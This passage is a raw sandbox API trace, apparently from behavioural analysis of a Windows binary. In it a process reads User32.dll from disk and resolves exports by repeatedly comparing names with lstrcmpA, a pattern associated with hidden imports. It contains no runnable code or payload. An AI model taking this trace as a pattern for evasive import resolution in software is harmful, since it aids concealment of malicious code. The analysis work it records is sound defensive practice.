(lpString1="GetAcceptLanguagesA", lpString2="ColorRGBToHLS") returned 1 [0092.085] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ConnectToConnectionPoint") returned 1 [0092.085] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DelayLoadFailureHook") returned 1 [0092.085] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetClassObject") returned 1 [0092.085] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetVersion") returned 1 [0092.085] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GUIDFromStringW") returned -1 [0092.085] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GetAcceptLanguagesA") returned 0 [0092.085] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocCreate") returned 1 [0092.085] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocGetPerceivedType") returned 1 [0092.085] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocIsDangerous") returned 1 [0092.085] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyA") returned 1 [0092.085] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyW") returned 1 [0092.085] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringA") returned 1 [0092.085] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyA") returned 1 [0092.085] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyW") returned 1 [0092.085] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringW") returned 1 [0092.085] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIA") returned 1 [0092.085] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIW") returned 1 [0092.085] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorAdjustLuma") returned 1 [0092.085] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorHLSToRGB") returned 1 [0092.085] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorRGBToHLS") returned 1 [0092.085] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ConnectToConnectionPoint") returned 1 [0092.085] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DelayLoadFailureHook") returned 1 [0092.085] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetClassObject") returned 1 [0092.086] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetVersion") returned 1 [0092.086] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GUIDFromStringW") returned -1 [0092.086] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesA") returned 1 [0092.086] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesW") returned 0 [0092.086] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocCreate") returned 1 [0092.086] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocGetPerceivedType") returned 1 [0092.086] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocIsDangerous") returned 1 [0092.086] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyA") returned 1 [0092.086] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyW") returned 1 [0092.086] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringA") returned 1 [0092.086] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyA") returned 1 [0092.086] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyW") returned 1 [0092.086] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringW") returned 1 [0092.086] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIA") returned 1 [0092.086] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIW") returned 1 [0092.086] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorAdjustLuma") returned 1 [0092.086] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorHLSToRGB") returned 1 [0092.086] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorRGBToHLS") returned 1 [0092.086] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ConnectToConnectionPoint") returned 1 [0092.086] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DelayLoadFailureHook") returned 1 [0092.086] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetClassObject") returned 1 [0092.086] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetVersion") returned 1 [0092.106] GetProcessHeap () returned 0x440000 [0092.106] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2c75030 | out: hHeap=0x440000) returned 1 [0092.106] GetProcessHeap () returned 0x440000 [0092.106] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x10) returned 0x459120 [0092.106] LoadLibraryA (lpLibFileName="User32.dll") returned 0x7ffc5e960000 [0092.107] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0092.107] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0092.107] GetModuleFileNameA (in: hModule=0x7ffc5e960000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0092.107] CreateFileA (lpFileName="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0092.107] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0092.107] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0092.107] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1398200) returned 1 [0092.107] GetProcessHeap () returned 0x440000 [0092.107] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x1555b8) returned 0x4032040 [0092.112] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0092.112] ReadFile (in: hFile=0x17c, lpBuffer=0x4032040, nNumberOfBytesToRead=0x1555b8, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4032040*, lpNumberOfBytesRead=0x14f5a4*=0x1555b8, lpOverlapped=0x0) returned 1 [0092.654] CloseHandle (hObject=0x17c) returned 1 [0092.654] lstrcmpA (lpString1="ActivateKeyboardLayout", lpString2="ActivateKeyboardLayout") returned 0 [0092.654] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="ActivateKeyboardLayout") returned 1 [0092.655] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="AddClipboardFormatListener") returned 0 [0092.655] lstrcmpA (lpString1="AdjustWindowRect", lpString2="ActivateKeyboardLayout") returned 1 [0092.655] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AddClipboardFormatListener") returned 1 [0092.655] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AdjustWindowRect") returned 0 [0092.655] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="ActivateKeyboardLayout") returned 1 [0092.655] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AddClipboardFormatListener") returned 1 [0092.655] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRect") returned 1 [0092.655] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRectEx") returned 0 [0092.655] lstrcmpA (lpString1="AlignRects", lpString2="ActivateKeyboardLayout") returned 1 [0092.655] lstrcmpA (lpString1="AlignRects", lpString2="AddClipboardFormatListener") returned 1 [0092.655] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRect") returned 1 [0092.655] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRectEx") returned 1 [0092.655] lstrcmpA (lpString1="AlignRects", lpString2="AlignRects") returned 0 [0092.655] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="ActivateKeyboardLayout") returned 1 [0092.655] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AddClipboardFormatListener") returned 1 [0092.655] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRect") returned 1 [0092.655] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRectEx") returned 1 [0092.655] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AlignRects") returned 1 [0092.655] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AllowForegroundActivation") returned 0 [0092.656] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="ActivateKeyboardLayout") returned 1 [0092.656] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AddClipboardFormatListener") returned 1 [0092.656] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRect") returned 1 [0092.656] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRectEx") returned 1 [0092.656] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AlignRects") returned 1 [0092.656] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowForegroundActivation") returned 1 [0092.656] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowSetForegroundWindow") returned 0 [0092.656] lstrcmpA (lpString1="AnimateWindow", lpString2="ActivateKeyboardLayout") returned 1 [0092.656] lstrcmpA (lpString1="AnimateWindow", lpString2="AddClipboardFormatListener") returned 1 [0092.656] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRect") returned 1 [0092.656] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRectEx") returned 1 [0092.656] lstrcmpA (lpString1="AnimateWindow", lpString2="AlignRects") returned 1 [0092.656] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowForegroundActivation") returned 1 [0092.656] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowSetForegroundWindow") returned 1 [0092.656] lstrcmpA (lpString1="AnimateWindow", lpString2="AnimateWindow") returned 0 [0092.657] lstrcmpA (lpString1="AnyPopup", lpString2="ActivateKeyboardLayout") returned 1 [0092.657] lstrcmpA (lpString1="AnyPopup", lpString2="AddClipboardFormatListener") returned 1 [0092.657] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRect") returned 1 [0092.657] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRectEx") returned 1 [0092.657] lstrcmpA (lpString1="AnyPopup", lpString2="AlignRects") returned 1 [0092.657] lstrcmpA (lpString1="AnyPopup", lpString2="AllowForegroundActivation") returned 1 [0092.657] lstrcmpA (lpString1="AnyPopup", lpString2="AllowSetForegroundWindow") returned 1 [0092.657] lstrcmpA (lpString1="AnyPopup", lpString2="AnimateWindow") returned 1 [0092.657] lstrcmpA (lpString1="AnyPopup", lpString2="AnyPopup") returned 0 [0092.657] lstrcmpA (lpString1="AppendMenuA", lpString2="ActivateKeyboardLayout") returned 1 [0092.657] lstrcmpA (lpString1="AppendMenuA", lpString2="AddClipboardFormatListener") returned 1 [0092.657] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRect") returned 1 [0092.657] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRectEx") returned 1 [0092.657] lstrcmpA (lpString1="AppendMenuA", lpString2="AlignRects") returned 1 [0092.657] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowForegroundActivation") returned 1 [0092.657] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowSetForegroundWindow") returned 1 [0092.657] lstrcmpA (lpString1="AppendMenuA", lpString2="AnimateWindow") returned 1 [0092.657] lstrcmpA (lpString1="AppendMenuA", lpString2="AnyPopup") returned 1 [0092.658] lstrcmpA (lpString1="AppendMenuA", lpString2="AppendMenuA") returned 0 [0092.658] lstrcmpA (lpString1="AppendMenuW", lpString2="ActivateKeyboardLayout") returned 1 [0092.658] lstrcmpA (lpString1="AppendMenuW", lpString2="AddClipboardFormatListener") returned 1 [0092.658] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRect") returned 1 [0092.658] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRectEx") returned 1 [0092.658] lstrcmpA (lpString1="AppendMenuW", lpString2="AlignRects") returned 1 [0092.658] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowForegroundActivation") returned 1 [0092.658] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowSetForegroundWindow") returned 1 [0092.658] lstrcmpA (lpString1="AppendMenuW", lpString2="AnimateWindow") returned 1 [0092.658] lstrcmpA (lpString1="AppendMenuW", lpString2="AnyPopup") returned 1 [0092.658] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuA") returned 1 [0092.658] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuW") returned 0 [0092.658] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ActivateKeyboardLayout") returned 1 [0092.659] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AddClipboardFormatListener") returned 1 [0092.659] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRect") returned 1 [0092.659] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRectEx") returned 1 [0092.659] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AlignRects") returned 1 [0092.659] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowForegroundActivation") returned 1 [0092.659] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowSetForegroundWindow") returned 1 [0092.659] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnimateWindow") returned 1 [0092.659] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnyPopup") returned 1 [0092.659] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuA") returned 1 [0092.659] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuW") returned 1 [0092.659] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ArrangeIconicWindows") returned 0 [0092.659] lstrcmpA (lpString1="AttachThreadInput", lpString2="ActivateKeyboardLayout") returned 1 [0092.659] lstrcmpA (lpString1="AttachThreadInput", lpString2="AddClipboardFormatListener") returned 1 [0092.659] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRect") returned 1 [0092.659] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRectEx") returned 1 [0092.659] lstrcmpA (lpString1="AttachThreadInput", lpString2="AlignRects") returned 1 [0092.659] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowForegroundActivation") returned 1 [0092.659] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowSetForegroundWindow") returned 1 [0092.659] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnimateWindow") returned 1 [0092.659] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnyPopup") returned 1 [0092.659] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuA") returned 1 [0092.659] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuW") returned 1 [0092.659] lstrcmpA (lpString1="AttachThreadInput", lpString2="ArrangeIconicWindows") returned 1 [0092.660] lstrcmpA (lpString1="AttachThreadInput", lpString2="AttachThreadInput") returned 0 [0092.660] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ActivateKeyboardLayout") returned 1 [0092.660] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AddClipboardFormatListener") returned 1 [0092.660] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRect") returned 1 [0092.660] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRectEx") returned 1 [0092.660] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AlignRects") returned 1 [0092.660] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowForegroundActivation") returned 1 [0092.660] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowSetForegroundWindow") returned 1 [0092.660] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnimateWindow") returned 1 [0092.660] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnyPopup") returned 1 [0092.660] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuA") returned 1 [0092.660] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuW") returned 1 [0092.660] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ArrangeIconicWindows") returned 1 [0092.660] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AttachThreadInput") returned 1 [0092.660] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="BeginDeferWindowPos") returned 0 [0092.660] lstrcmpA (lpString1="BeginPaint", lpString2="ActivateKeyboardLayout") returned 1 [0092.660] lstrcmpA (lpString1="BeginPaint", lpString2="AddClipboardFormatListener") returned 1 [0092.660] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRect") returned 1 [0092.660] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRectEx") returned 1 [0092.660] lstrcmpA (lpString1="BeginPaint", lpString2="AlignRects") returned 1 [0092.660] lstrcmpA (lpString1="BeginPaint", lpString2="AllowForegroundActivation") returned 1 [0092.660] lstrcmpA (lpString1="BeginPaint", lpString2="AllowSetForegroundWindow") returned 1 [0092.660] lstrcmpA (lpString1="BeginPaint", lpString2="AnimateWindow") returned 1 [0092.660] lstrcmpA (lpString1="BeginPaint", lpString2="AnyPopup") returned 1 [0092.660] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuA") returned 1 [0092.661] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuW") returned 1 [0092.661] lstrcmpA (lpString1="BeginPaint", lpString2="ArrangeIconicWindows") returned 1 [0092.661] lstrcmpA (lpString1="BeginPaint", lpString2="AttachThreadInput") returned 1 [0092.661] lstrcmpA (lpString1="BeginPaint", lpString2="BeginDeferWindowPos") returned 1 [0092.661] lstrcmpA (lpString1="BeginPaint", lpString2="BeginPaint") returned 0 [0092.661] lstrcmpA (lpString1="BlockInput", lpString2="ActivateKeyboardLayout") returned 1 [0092.661] lstrcmpA (lpString1="BlockInput", lpString2="AddClipboardFormatListener") returned 1 [0092.661] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRect") returned 1 [0092.661] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRectEx") returned 1 [0092.661] lstrcmpA (lpString1="BlockInput", lpString2="AlignRects") returned 1 [0092.661] lstrcmpA (lpString1="BlockInput", lpString2="AllowForegroundActivation") returned 1 [0092.661] lstrcmpA (lpString1="BlockInput", lpString2="AllowSetForegroundWindow") returned 1 [0092.661] lstrcmpA (lpString1="BlockInput", lpString2="AnimateWindow") returned 1 [0092.661] lstrcmpA (lpString1="BlockInput", lpString2="AnyPopup") returned 1 [0092.661] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuA") returned 1 [0092.661] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuW") returned 1 [0092.661] lstrcmpA (lpString1="BlockInput", lpString2="ArrangeIconicWindows") returned 1 [0092.661] lstrcmpA (lpString1="BlockInput", lpString2="AttachThreadInput") returned 1 [0092.661] lstrcmpA (lpString1="BlockInput", lpString2="BeginDeferWindowPos") returned 1 [0092.661] lstrcmpA (lpString1="BlockInput", lpString2="BeginPaint") returned 1 [0092.661] lstrcmpA (lpString1="BlockInput", lpString2="BlockInput") returned 0 [0092.661] lstrcmpA (lpString1="BringWindowToTop", lpString2="ActivateKeyboardLayout") returned 1 [0092.661] lstrcmpA (lpString1="BringWindowToTop", lpString2="AddClipboardFormatListener") returned 1 [0092.661] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRect") returned 1 [0092.661] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRectEx") returned 1 [0092.661] lstrcmpA (lpString1="BringWindowToTop", lpString2="AlignRects") returned 1 [0092.661] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowForegroundActivation") returned 1 [0092.661] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowSetForegroundWindow") returned 1 [0092.661] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnimateWindow") returned 1 [0092.662] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnyPopup") returned 1 [0092.662] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuA") returned 1 [0092.662] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuW") returned 1 [0092.662] lstrcmpA (lpString1="BringWindowToTop", lpString2="ArrangeIconicWindows") returned 1 [0092.662] lstrcmpA (lpString1="BringWindowToTop", lpString2="AttachThreadInput") returned 1 [0092.662] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginDeferWindowPos") returned 1 [0092.662] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginPaint") returned 1 [0092.662] lstrcmpA (lpString1="BringWindowToTop", lpString2="BlockInput") returned 1 [0092.662] lstrcmpA (lpString1="BringWindowToTop", lpString2="BringWindowToTop") returned 0 [0092.662] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ActivateKeyboardLayout") returned 1 [0092.662] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AddClipboardFormatListener") returned 1 [0092.662] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRect") returned 1 [0092.662] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRectEx") returned 1 [0092.662] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AlignRects") returned 1 [0092.662] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowForegroundActivation") returned 1 [0092.662] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowSetForegroundWindow") returned 1 [0092.662] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnimateWindow") returned 1 [0092.662] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnyPopup") returned 1 [0092.662] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuA") returned 1 [0092.662] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuW") returned 1 [0092.662] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ArrangeIconicWindows") returned 1 [0092.662] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AttachThreadInput") returned 1 [0092.662] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginDeferWindowPos") returned 1 [0092.662] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginPaint") returned 1 [0092.662] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BlockInput") returned 1 [0092.662] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BringWindowToTop") returned 1 [0092.662] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BroadcastSystemMessage") returned 0 [0092.662] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ActivateKeyboardLayout") returned 1 [0092.662] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AddClipboardFormatListener") returned 1 [0092.663] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRect") returned 1 [0092.663] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRectEx") returned 1 [0092.663] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AlignRects") returned 1 [0092.663] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowForegroundActivation") returned 1 [0092.663] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowSetForegroundWindow") returned 1 [0092.663] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnimateWindow") returned 1 [0092.663] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnyPopup") returned 1 [0092.663] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuA") returned 1 [0092.663] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuW") returned 1 [0092.663] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ArrangeIconicWindows") returned 1 [0092.663] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AttachThreadInput") returned 1 [0092.663] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginDeferWindowPos") returned 1 [0092.663] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginPaint") returned 1 [0092.663] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BlockInput") returned 1 [0092.663] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BringWindowToTop") returned 1 [0092.663] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessage") returned 1 [0092.663] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessageA") returned 0 [0092.663] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ActivateKeyboardLayout") returned 1 [0092.663] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AddClipboardFormatListener") returned 1 [0092.663] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRect") returned 1 [0092.663] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRectEx") returned 1 [0092.663] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AlignRects") returned 1 [0092.663] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowForegroundActivation") returned 1 [0092.663] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowSetForegroundWindow") returned 1 [0092.663] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnimateWindow") returned 1 [0092.663] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnyPopup") returned 1 [0092.663] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuA") returned 1 [0092.663] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuW") returned 1 [0092.663] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ArrangeIconicWindows") returned 1 [0092.663] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AttachThreadInput") returned 1 [0092.664] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginDeferWindowPos") returned 1 [0092.664] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginPaint") returned 1 [0092.664] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BlockInput") returned 1 [0092.664] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BringWindowToTop") returned 1 [0092.664] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessage") returned 1 [0092.664] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageA") returned 1 [0092.664] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageExA") returned 0 [0092.664] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ActivateKeyboardLayout") returned 1 [0092.664] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AddClipboardFormatListener") returned 1 [0092.664] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRect") returned 1 [0092.664] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRectEx") returned 1 [0092.664] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AlignRects") returned 1 [0092.664] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowForegroundActivation") returned 1 [0092.664] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowSetForegroundWindow") returned 1 [0092.664] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnimateWindow") returned 1 [0092.664] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnyPopup") returned 1 [0092.664] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuA") returned 1 [0092.664] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuW") returned 1 [0092.664] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ArrangeIconicWindows") returned 1 [0092.664] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AttachThreadInput") returned 1 [0092.664] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginDeferWindowPos") returned 1 [0092.664] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginPaint") returned 1 [0092.664] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BlockInput") returned 1 [0092.664] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BringWindowToTop") returned 1 [0092.664] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessage") returned 1 [0092.664] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageA") returned 1 [0092.664] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExA") returned 1 [0092.664] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExW") returned 0 [0092.664] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ActivateKeyboardLayout") 